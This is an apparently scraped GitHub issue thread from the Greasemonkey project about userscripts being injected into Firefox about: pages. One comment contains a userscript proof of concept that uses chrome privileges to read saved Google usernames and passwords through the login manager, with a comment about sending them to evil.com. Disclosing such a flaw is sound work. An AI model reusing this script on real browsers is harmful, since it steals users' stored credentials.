-
Notifications
You must be signed in to change notification settings - Fork 323
New issue
Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.
By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.
Already on GitHub? Sign in to your account
Script injection attempted in about:addons #1302
Comments
Closing invalid, I can't come close to reproducing any of this. |
monkey menu has been completely refactored and broken, as acknowledged in #1306, by this commit forward thus invalidated this report. Still present in GM 0.9.1 release. Closing as invalidated-by would be a more proper tag along with commit reference. |
Refs greasemonkey#1302 (this is probably what was being described)
I found that user script run on these about pages has chrome previleges
I tried the snippet on https://developer.mozilla.org/en/Using_nsILoginManager#Retrieving_a_password worked with user script run on the above pages. // ==UserScript==
// @name Retrieving passwords via about: pages
// @namespace http://mozilla.status.net/loucypher
// @include about:*
// ==/UserScript==
var hostname = 'https://www.google.com';
var formSubmitURL = 'https://www.google.com'; // not http://www.example.com/foo/auth.cgi
var httprealm = null;
var username, password;
try {
var myLoginManager = Components.classes["@mozilla.org/login-manager;1"].
getService(Components.interfaces.nsILoginManager);
var logins = myLoginManager.findLogins({}, hostname, formSubmitURL, httprealm);
var info = "";
for (var i = 0; i < logins.length; i++) {
info += logins[i].username + "\n";
info += logins[i].password + "\n\n";
}
//GM_log(info);
alert(info); // show usernames and passwords for google.com
// or send to evil.com via XHR (untested)
} catch(ex) {
// This will only happen if there is no nsILoginManager component class
//GM_log(ex);
} |
Lou: Please open a (separate) bug for this.
But scripts don't run there unless you toggle |
I thought it was relevant but.. Ok then
Yes, but it shouldn't have chrome previleges. |
Whether it is or not, this issue is closed. The point of issues is to be open, fixed, then closed, to track what still needs doing and what is already done. It's really hard to organize work on issues that are already closed. |
Original title: Script injection attempted in about:addons
In Firefox 4.x, Greasemonkey attempts to inject a script when @include rule is set to about:addons and user navigates to about:addons which also throws this warning
Sample script
The monkey menu also reflects this attempt as being successfully injected however no alert happens. It is handy to have the popup menu available however it shouldn't reflect nor try to inject a script at this URI.
The text was updated successfully, but these errors were encountered: